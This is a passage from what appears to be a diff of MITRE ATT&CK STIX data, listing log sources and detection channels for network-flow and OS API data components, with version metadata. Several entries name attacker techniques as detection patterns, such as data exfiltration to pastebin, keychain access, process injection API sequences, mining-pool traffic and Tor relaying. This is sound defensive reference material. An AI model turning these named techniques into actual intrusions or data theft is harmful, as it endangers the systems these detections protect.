+                            "channel": "Unusual volume of inbound packets from single source across short time interval"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "port 5900 inbound"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "TCP port 5900 open"
+                        },
+                        {
+                            "name": "NSM:firewall",
+                            "channel": "inbound connection to port 5900"
+                        },
+                        {
+                            "name": "NSM:Firewall",
+                            "channel": "Outbound connections to 139/445 to multiple destinations"
+                        },
+                        {
+                            "name": "VPCFlowLogs:All",
+                            "channel": "High volume internal traffic with low entropy indicating looped or malicious DoS script"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "NetFlow/sFlow/PCAP"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound Network Flow"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "com.apple.network"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Device-to-Device Deployment Flows"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "socket/connect syscalls"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "outbound TCP/UDP traffic over unexpected port"
+                        },
+                        {
+                            "name": "esxi:vpxd",
+                            "channel": "ESXi service connections on unexpected ports"
+                        },
+                        {
+                            "name": "iptables:LOG",
+                            "channel": "OUTBOUND"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "tcp/udp"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "CLI network calls"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound traffic from suspicious new processes post-attachment execution"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Suspicious anomalies in transmitted data integrity during application network operations"
+                        },
+                        {
+                            "name": "esxi:syslog",
+                            "channel": "DNS resolution events leading to outbound traffic on unexpected ports"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound traffic to mining pools or proxies"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "Outbound flow logs to known mining pools"
+                        },
+                        {
+                            "name": "container:cni",
+                            "channel": "Outbound network traffic to mining proxies"
+                        },
+                        {
+                            "name": "esxi:vpxd",
+                            "channel": "TLS session established by ESXi service to unapproved endpoint"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Session records with TLS-like byte patterns"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "HTTPS POST requests to pastebin.com or similar"
+                        },
+                        {
+                            "name": "NetFlow:Flow",
+                            "channel": "new outbound connections from exploited process tree"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "new connections from exploited lineage"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Unexpected route changes or duplicate gateway advertisements"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-Windows Firewall With Advanced Security/Firewall",
+                            "channel": "EventCode=2004, 2005, 2006"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Knock pattern: repeated REJ/S0 across \u2265MinSequenceLen ports from same src_ip then SF success."
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Firewall/PF anchor load or rule change events."
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Config/ACL changes, line vty transport input changes, telnet/ssh/http(s) enable, image/feature module changes."
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "First-time egress to non-approved update hosts right after install/update"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "New outbound flows to non-approved vendor hosts post install"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "New/rare egress to non-approved update hosts after install"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "large outbound HTTPS uploads to repo domains"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "HTTPS traffic to repository domains"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "alert log"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound flow records"
+                        },
+                        {
+                            "name": "m365:defender",
+                            "channel": "NetworkConnection: high out:in ratio, periodic beacons, protocol mismatch"
+                        },
+                        {
+                            "name": "PF:Logs",
+                            "channel": "high out:in ratio or fixed-size periodic flows"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "network_flow: bytes_out >> bytes_in, fixed packet sizes/intervals to non-approved CIDRs"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "connect or sendto system call with burst pattern"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "sudden burst in outgoing packets from same PID"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "source instance sends large volume of traffic in short window"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "session stats with bytes_out > bytes_in"
+                        },
+                        {
+                            "name": "NIDS:Flow",
+                            "channel": "session stats with bytes_out > bytes_in"
+                        },
+                        {
+                            "name": "esxi:vpxa",
+                            "channel": "connection attempts and data transmission logs"
+                        },
+                        {
+                            "name": "PF:Logs",
+                            "channel": "External traffic to remote access services"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "High volumes of SYN/ACK packets with unacknowledged TCP handshakes"
+                        },
+                        {
+                            "name": "dns:query",
+                            "channel": "Outbound resolution to hidden service domains (e.g., `.onion`)"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "conn.log + ssl.log with Tor fingerprinting"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "forwarded encrypted traffic"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Relayed session pathing (multi-hop)"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound TCP SYN or UDP to multiple ports/hosts"
+                        },
+                        {
+                            "name": "containerd:runtime",
+                            "channel": "container-level outbound traffic events"
+                        },
+                        {
+                            "name": "WLANLogs:Association",
+                            "channel": "Multiple APs advertising the same SSID but with different BSSID/MAC or encryption type"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "socket_events"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "ARP cache modification attempts observed through event tracing or security baselines"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Gratuitous ARP replies with mismatched IP-MAC binding"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "ARP table updates inconsistent with expected gateway or DHCP lease assignments"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "networkd or com.apple.network"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream 'eventMessage contains \"dns_request\"'"
+                        },
+                        {
+                            "name": "esxi:syslog",
+                            "channel": "/var/log/syslog.log"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "CreateTrafficMirrorSession or ModifyTrafficMirrorTarget"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Config change: CLI/NETCONF/SNMP \u2013 'monitor session', 'mirror port'"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound UDP floods targeting common reflection services with spoofed IP headers"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Outbound UDP spikes to external reflector IPs"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "Large outbound UDP traffic to multiple public reflector IPs"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "High entropy domain queries with multiple NXDOMAINs"
+                        },
+                        {
+                            "name": "esxi:syslog",
+                            "channel": "Frequent DNS queries with high entropy names or NXDOMAIN results"
+                        },
+                        {
+                            "name": "vpxd.log",
+                            "channel": "API communication"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "Outbound Connection"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Connection Tracking"
+                        },
+                        {
+                            "name": "NSM:Firewall",
+                            "channel": "pf firewall logs"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Flow Creation (NetFlow/sFlow)"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "conn.log, icmp.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Abnormal SMB authentication attempts correlated with poisoned LLMNR/NBT-NS sessions"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Gratuitous or duplicate DHCP OFFER packets from non-legitimate servers"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "Inbound on ports 5985/5986"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Multiple IP addresses assigned to the same domain in rapid sequence"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Rapid domain-to-IP resolution changes for same domain"
+                        },
+                        {
+                            "name": "esxi:syslog",
+                            "channel": "Frequent DNS resolution of same domain with rotating IPs"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "uncommon ports"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "alternate ports"
+                        },
+                        {
+                            "name": "esxi:vpxd",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "conn.log or flow data"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "egress log analysis"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "egress logs"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "High volume flows with incomplete TCP sessions or single-packet bursts"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Knock pattern: multiple REJ/S0 to distinct closed ports then successful connection to service_port"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Firewall rule enable/disable or listen socket changes"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Config/ACL/line vty changes, service enable (telnet/ssh/http(s)), module reloads"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "ioctl: Changes to wireless network interfaces (up, down, reassociate)"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "query: Historical list of associated SSIDs compared against baseline"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "First-time egress from host after new install to unknown update endpoints"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "First-time egress to unknown registries/mirrors immediately after install"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "New egress from app just installed to unknown update endpoints"
+                        },
+                        {
+                            "name": "esxi:vpxd",
+                            "channel": "ESXi processes relaying traffic via SSH or unexpected ports"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound connection to mining pool port (3333, 4444, 5555)"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound traffic to mining pool upon container launch"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Flow records with RSA key exchange on unexpected port"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound connections from web server binaries (apache2, nginx, php-fpm) to unknown external IPs"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "sustained outbound HTTPS sessions with high data volume"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Connections from IDE hosts to marketplace/tunnel domains"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Outbound connections from IDE processes to marketplace/tunnel domains"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "large HTTPS outbound uploads"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "network flows to external cloud services"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "TCP port 22 traffic"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "port 22 access"
+                        },
+                        {
+                            "name": "TelecomLogs:MobilityEvents",
+                            "channel": "Unexpected location resolution events or abnormal subscriber tracking requests"
+                        },
+                        {
+                            "name": "TelecomLogs:MobilityEvents",
+                            "channel": "Unexpected subscriber tracking or abnormal mobility/location resolution activity"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Application-layer protocol traffic exhibiting beacon-like periodicity, anomalous session structure, or protocol misuse patterns"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "App-attributed traffic exhibits multi-destination fan-out, sustained session bridging, or SOCKS-like relay behavior inconsistent with normal client-only mobile communication"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.1",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "mobile-attack",
+                        "enterprise-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.777000+00:00\", \"old_value\": \"2026-04-09 17:32:30.362000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/datacomponents/DC0078\", \"old_value\": \"https://attack.mitre.org/data-components/DC0078\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.272000+00:00",
+                    "modified": "2026-05-12 15:12:00.775000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0021",
+                            "external_id": "DC0021"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "OS API Execution",
+                    "description": "Calls made by a process to operating system-provided Application Programming Interfaces (APIs). These calls are essential for interacting with system resources such as memory, files, and hardware, or for performing system-level tasks. Monitoring these calls can provide insight into a process's intent, especially if the process is malicious.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "Process",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-Base",
+                            "channel": "GetLocaleInfoW, GetTimeZoneInformation API calls"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "GetMetadata, DescribeInstanceIdentity"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "open, execve: Unexpected processes accessing or modifying critical files"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "ptrace, ioctl"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-Process",
+                            "channel": "API tracing / stack tracing via ETW or telemetry-based EDR"
+                        },
+                        {
+                            "name": "EDR:memory",
+                            "channel": "Behavioral API telemetry (GetProcAddress, LoadLibrary, VirtualAlloc)"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "aaa privilege_exec"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-Process",
+                            "channel": "APCQueueOperations"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Invocation of SMLoginItemSetEnabled by non-system or recently installed application"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "flock|NSDistributedLock|FileHandle.*lockForWriting"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Directory-Services-SAM",
+                            "channel": "api_call: Calls to DsAddSidHistory or related RPC operations"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "application logs referencing NSTimer, sleep, or launchd delays"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-Process",
+                            "channel": "High-frequency or suspicious sequence of QueryPerformanceCounter/GetTickCount API calls from a non-standard process lineage"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Rules capturing clock_gettime, time, gettimeofday syscalls when enabled"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Unexpected reload, crashinfo, or boot message not tied to scheduled maintenance"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-RPC",
+                            "channel": "rpc_call: srvsvc.NetShareEnum / NetShareEnumAll from non-admin or unusual processes"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "smb_command: TreeConnectAndX to \\\\*\\IPC$ / srvsvc or Trans2/NT_CREATE for listing shares"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4663, 4670, 4656"
+                        },
+                        {
+                            "name": "EDR:memory",
+                            "channel": "API usage MFCreateDeviceSource, IAMStreamConfig, ICaptureGraphBuilder2, DirectShow filter graph creation from uncommon callers"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "openat/read/ioctl: openat/read/ioctl on /dev/video* by uncommon user/process"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Access decisions to kTCCServiceCamera for unexpected binaries"
+                        },
+                        {
+                            "name": "EDR:memory",
+                            "channel": "Objective\u2011C/Swift calls to AVCaptureDevice/AVCaptureSession by non-whitelisted processes"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "mmap, ptrace, process_vm_writev or direct memory ops"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "API call to AddMonitor invoked by non-installer process"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Win32k",
+                            "channel": "SetWindowLong, SetClassLong, NtUserMessageCall, SendNotifyMessage, PostMessage"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "unshare, mount, keyctl, setns syscalls executed by containerized processes"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "audio APIs"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-COM/Operational",
+                            "channel": "CLSID activation events where ProcessName=mmc.exe and CLSID not in allowed baseline"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "com.apple.securityd, com.apple.tccd"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "send, recv, write: Abnormal interception or alteration of transmitted data"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "CALCULATE: Integrity validation of transmitted data via hash checks"
+                        },
+                        {
+                            "name": "ETW:Token",
+                            "channel": "token_analysis: API calls such as DuplicateTokenEx or ImpersonateLoggedOnUser"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-Process",
+                            "channel": "API Calls"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-DotNETRuntime",
+                            "channel": "AssemblyLoad/ModuleLoad (Loader keyword) from Microsoft-Windows-DotNETRuntime"
+                        },
+                        {
+                            "name": "EDR:memory",
+                            "channel": "VirtualAlloc/VirtualProtect/MapViewOfFile indicators via stack/heap activity and ImageLoad"
+                        },
+                        {
+                            "name": "auditd:MMAP",
+                            "channel": "memory region with RWX permissions allocated"
+                        },
+                        {
+                            "name": "snmp:trap",
+                            "channel": "management queries"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "Describe* or List* API calls"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Win32k",
+                            "channel": "SendMessage, PostMessage, LVM_*"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "sudo or pkexec invocation"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "authorization execute privilege requests"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-Process",
+                            "channel": "NtQueryInformationProcess"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "ptrace: Processes invoking ptrace with PTRACE_TRACEME flag"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "Remote access API calls and file uploads"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-Process",
+                            "channel": "NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory, SetThreadContext, ResumeThread"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Execution of modified binaries or abnormal library load sequences"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Calls to AuthorizationExecuteWithPrivileges() observed via Apple System Logger or security_auditing tools"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "access or unlock attempt to keychain database"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of input detection APIs (e.g., CGEventSourceKeyState)"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "mount system call with bind or remap flags"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "Decrypt"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-File",
+                            "channel": "ZwSetEaFile or ZwQueryEaFile function calls"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "fork/clone/daemon syscall tracing"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "Detached process execution with no associated parent"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "ptrace, mmap, mprotect, open, dlopen"
+                        },
+                        {
+                            "name": "ETW:ProcThread",
+                            "channel": "api_call: CreateProcessWithTokenW, CreateProcessAsUserW"
+                        },
+                        {
+                            "name": "EDR:memory",
+                            "channel": "MemoryWriteToExecutable"
+                        },
+                        {
+                            "name": "ETW:Token",
+                            "channel": "api_call: DuplicateTokenEx, ImpersonateLoggedOnUser, SetThreadToken"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-Process",
+                            "channel": "api_call: UpdateProcThreadAttribute (PROC_THREAD_ATTRIBUTE_PARENT_PROCESS) and CreateProcess* with EXTENDED_STARTUPINFO_PRESENT / StartupInfoEx"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Security-Auditing",
+                            "channel": "api_call: LogonUser(A|W), LsaLogonUser, SetThreadToken, ImpersonateLoggedOnUser"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-Process",
+                            "channel": "API calls"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "ptrace, mmap, process_vm_writev"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve of dd or sed targeting /proc/*/mem"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-Process",
+                            "channel": "CreateTransaction, CreateFileTransacted, RollbackTransaction, NtCreateProcessEx, NtCreateThreadEx"
+                        },
+                        {
+                            "name": "ETW",
+                            "channel": "Calls to GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetKeyboardLayoutList"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-Process",
+                            "channel": "WriteProcessMemory: WriteProcessMemory targeting regions containing KernelCallbackTable addresses"
+                        },
+                        {
+                            "name": "EDR:file",
+                            "channel": "SetFileTime"
+                        },
+                        {
+                            "name": "AndroidLogs:Kernel",
+                            "channel": "Unprivileged app process (app UID, non-system) invoking sensitive syscalls or device interfaces associated with privilege escalation (setuid, ptrace, perf_event_open, vulnerable drivers)"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "SELinux AVC for execmem/execute_no_trans/mprotect following recent writes by same UID"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "mmap/mprotect transitions to PROT_EXEC for pages associated with recently written files"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "QUERY on exported ContentProviders of other packages (content://<other.pkg>/*) or MediaStore scoped queries immediately preceding file reads"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "ClipboardManager (addOnPrimaryClipChangedListener|getPrimaryClip|getPrimaryClipDescription) invoked by <pkg>"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "AccessibilityService connected|TYPE_VIEW_TEXT_CHANGED|TYPE_VIEW_FOCUSED events for other packages"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "TYPE_WINDOW_STATE_CHANGED / TYPE_VIEW_FOCUSED shows foreign target package in foreground"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "PackageManager getInstalledApplications|getInstalledPackages|getPackagesHoldingPermissions burst for <pkg>. TYPE_WINDOW_STATE_CHANGED shows foreground app then immediate package queries by <pkg>"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "LSApplicationWorkspace or canOpenURL probe bursts for many URL schemes"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "getInstalledPackages/getPackagesHoldingPermissions with filters for known security/MDM/VPN package names. Queries to isDeviceOwnerApp/isProfileOwnerApp/getActiveAdmins/getPermissionGrantState. Requests list of enabled services or monitors TYPE_WINDOW_STATE_CHANGED to time checks"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Queries indicating MDM profile presence, supervised state, restrictions read. LSApplicationWorkspace enumeration or app proxy queries referencing security vendors"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "ACTION_VIEW redirect_uri handled by unexpected package"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "canOpenURL/LSApplicationWorkspace resolved to unexpected bundle for redirect_uri"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "query() against MediaStore/DocumentsContract URIs (Images/Video/Audio/Downloads/DocumentTree)"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "enumeratorForContainerItemIdentifier / itemForIdentifier across multiple containers/providers"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "wifiservice startScan / scanResults retrieved repeatedly or by unexpected package"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "bluetoothmanager startDiscovery / getBondedDevices / scan callback bursts by package"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "telephony cell info enumeration bursts (neighboring/all cell info) by package"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "repeated queries or dumps related to running tasks/services/process state by same package/UID (e.g., getRunningAppProcesses, running services/task inspection)"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Application accesses android.os.Build fields or device configuration APIs (MODEL, MANUFACTURER, VERSION.SDK_INT, HARDWARE)"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Application invokes UIDevice queries (model, systemVersion, name)"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Invocation of MediaRecorder.start(), AudioRecord.startRecording(), or VOICE_CALL audio source"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Invocation of AVAudioRecorder, AVCaptureSession, or related audio capture framework calls"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Application invokes LocationManager, FusedLocationProviderClient, or GPS/location sensor APIs"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Application activates CoreLocation services or CLLocationManager APIs"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Framework-based networking usage spikes or uncommon networking stacks observed by agent telemetry (e.g., repeated URLSession/OkHttp-like patterns) without corresponding foreground/user interaction"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Agent-observable telephony subscription/state API signals indicating SIM/eSIM subscription change (vendor-agnostic: 'telephony subscription changed')"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Accessibility framework usage patterns such as event subscription, performAction invocation, node traversal, text change observation, or overlay/window presentation correlated to app identity"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Browser/WebView framework usage indicating external URL load, script execution enablement, file download initiation, intent handoff, or package install prompt sequence"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Observed device-service, trust-service, backup/service interaction, or other privileged framework activity associated with physical host access"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Connectivity manager, telephony, Wi-Fi, network callback, or location-provider framework reports repeated unavailable, disconnected, suspended, or degraded state transitions"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Observed network-path, reachability, DNS, transport, or location-provider framework reports repeated unavailable or failed state near active device use"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Content resolver, document provider, media store, storage access framework, bulk stream processing, or repeated crypto-adjacent framework use observed during multi-file transformation"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Known application begins first-seen or expanded use of content providers, account services, accessibility, package services, cryptographic routines, dynamic loading, or other framework interactions after update/install"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Known application begins first-seen or expanded use of protected frameworks, account services, background task APIs, crypto/network service APIs, or other runtime behaviors after update/install"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Known application begins first-seen or expanded use of account services, accessibility, content providers, dynamic loading, package services, WebView bridges, crypto/network APIs, or advertising/telemetry-adjacent framework behavior after install or update"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Privileged or OEM-context framework/API use tied to telephony, device policy, accessibility, overlay, input injection, package visibility, or protected settings modification from an identity not expected for the device model or approved image"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Invocation of Calendar.set() and Calendar.add()"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Supplemental anomaly in baseband, IOKit, accessory, security, or activation-related subsystem logging temporally adjacent to suspicious posture or network behavior"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
